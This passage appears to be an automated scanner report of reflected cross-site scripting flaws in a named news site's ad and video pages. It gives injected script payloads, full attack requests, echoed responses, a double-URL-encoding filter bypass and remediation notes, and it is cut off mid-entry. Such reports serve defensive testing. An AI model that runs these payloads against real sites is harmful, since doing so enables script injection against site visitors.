<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/sports/red_sox/index.php/2011/01b9bc2\"><script>alert(1)</script>4c7b0ea2d57/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"> ...[SNIP]...
The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc2d1"><script>alert(1)</script>6c821273efd was submitted in the companion parameter. This input was echoed as bc2d1\"><script>alert(1)</script>6c821273efd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottombc2d1"><script>alert(1)</script>6c821273efd&page=bh.heraldinteractive.com%2Fhome HTTP/1.1 Host: www.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:40:21 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2112 Content-Type: text/html; charset=UTF-8 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a67b1</script><script>alert(1)</script>4ab8f6765b0 was submitted in the companion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottoma67b1</script><script>alert(1)</script>4ab8f6765b0&page=bh.heraldinteractive.com%2Fhome HTTP/1.1 Host: www.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:40:21 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2148 Content-Type: text/html; charset=UTF-8 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea775"><script>alert(1)</script>9030106f1a6 was submitted in the page parameter. This input was echoed as ea775\"><script>alert(1)</script>9030106f1a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhomeea775"><script>alert(1)</script>9030106f1a6 HTTP/1.1 Host: www.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:40:22 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2112 Content-Type: text/html; charset=UTF-8 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37376%2527%253balert%25281%2529%252f%252fe6f611bda68 was submitted in the page parameter. This input was echoed as 37376';alert(1)//e6f611bda68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome37376%2527%253balert%25281%2529%252f%252fe6f611bda68 HTTP/1.1 Host: www.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:40:23 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2016 Content-Type: text/html; charset=UTF-8 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7107c</script><script>alert(1)</script>2ef88115157 was submitted in the position parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=x147107c</script><script>alert(1)</script>2ef88115157&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1 Host: www.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:40:20 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2143 Content-Type: text/html; charset=UTF-8 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b75"><script>alert(1)</script>72445af01e was submitted in the position parameter. This input was echoed as a6b75\"><script>alert(1)</script>72445af01e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=x14a6b75"><script>alert(1)</script>72445af01e&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1 Host: www.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:40:20 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2101 Content-Type: text/html; charset=UTF-8 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
4.790. http://www.bostonherald.com/mediacenter/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bostonherald.com
Path:
/mediacenter/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b77b'-alert(1)-'44e32132f58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mediacenter/?7b77b'-alert(1)-'44e32132f58=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:23:18 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 450978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <title>Photos & Video - Boston ...[SNIP]... <script type="text/javascript"> // For pop-up windows in Now Playing pane hide_id = 0;
// Converts the GET params to a JSON object mcParams = '7b77b'-alert(1)-'44e32132f58=1'.toQueryParams();
The value of the bc_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ff3"><script>alert(1)</script>0e6ae86ba81 was submitted in the bc_id parameter. This input was echoed as 59ff3\"><script>alert(1)</script>0e6ae86ba81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=76678385900159ff3"><script>alert(1)</script>0e6ae86ba81&rand=408 HTTP/1.1 Host: www.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:40:22 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2577 Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- This Page is for Inclusion i ...[SNIP]... <object id="myExperience76678385900159ff3\"><script>alert(1)</script>0e6ae86ba81" class="BrightcoveExperience"> ...[SNIP]...
The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d42"><script>alert(1)</script>dad1887e031 was submitted in the height parameter. This input was echoed as e6d42\"><script>alert(1)</script>dad1887e031 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300e6d42"><script>alert(1)</script>dad1887e031&bc_id=766783859001&rand=408 HTTP/1.1 Host: www.bostonherald.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:40:21 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2577 Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- This Page is for Inclusion i ...[SNIP]... <param name="height" value="300e6d42\"><script>alert(1)</script>dad1887e031" /> ...[SNIP]...
The value of the media_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da509</script><script>alert(1)</script>08312a85049 was submitted in the media_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024da509</script><script>alert(1)</script>08312a85049&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:01:37 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2639 Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- This Page is for Inclusion i ...[SNIP]... se");
4.794. http://www.bostonherald.com/mediacenter/video.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bostonherald.com
Path:
/mediacenter/video.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 521f5</script><script>alert(1)</script>224f4942aaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Side/521f5</script><script>alert(1)</script>224f4942aaawalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:04:26 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2640 Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- This Page is for Inclusion i ...[SNIP]... http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024"); tmObj.set("VideoTitle", "Side/521f5</script><script>alert(1)</script>224f4942aaawalk"); tmObj.set("Category", "");
The value of the program_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73056</script><script>alert(1)</script>1e86b062507 was submitted in the program_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed626973056</script><script>alert(1)</script>1e86b062507&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:01:15 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2689 Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- This Page is for Inclusion i ...[SNIP]... ia.bostonherald.com/video/20110127/012711snowar.flv.jpg"); tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv.jpg");
tmObj.start('4c6ebfbed626973056</script><script>alert(1)</script>1e86b062507'); // Set in Acudeo Console
// 49ee2ce0476b3 -- incl bottom companion ad </script> ...[SNIP]...
The value of the program_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc846"><script>alert(1)</script>a2e44a869d6 was submitted in the program_id parameter. This input was echoed as cc846\"><script>alert(1)</script>a2e44a869d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269cc846"><script>alert(1)</script>a2e44a869d6&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:00:45 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2677 Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- This Page is for Inclusion i ...[SNIP]... <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269cc846\"><script>alert(1)</script>a2e44a869d6_p.js"> ...[SNIP]...
The value of the src request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9aa21</script><script>alert(1)</script>b29dc7874f2 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv9aa21</script><script>alert(1)</script>b29dc7874f2&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:00:30 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 2759 Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- This Page is for Inclusion i ...[SNIP]... image // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
The value of the title request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b51c2</script><script>alert(1)</script>07de356f883 was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
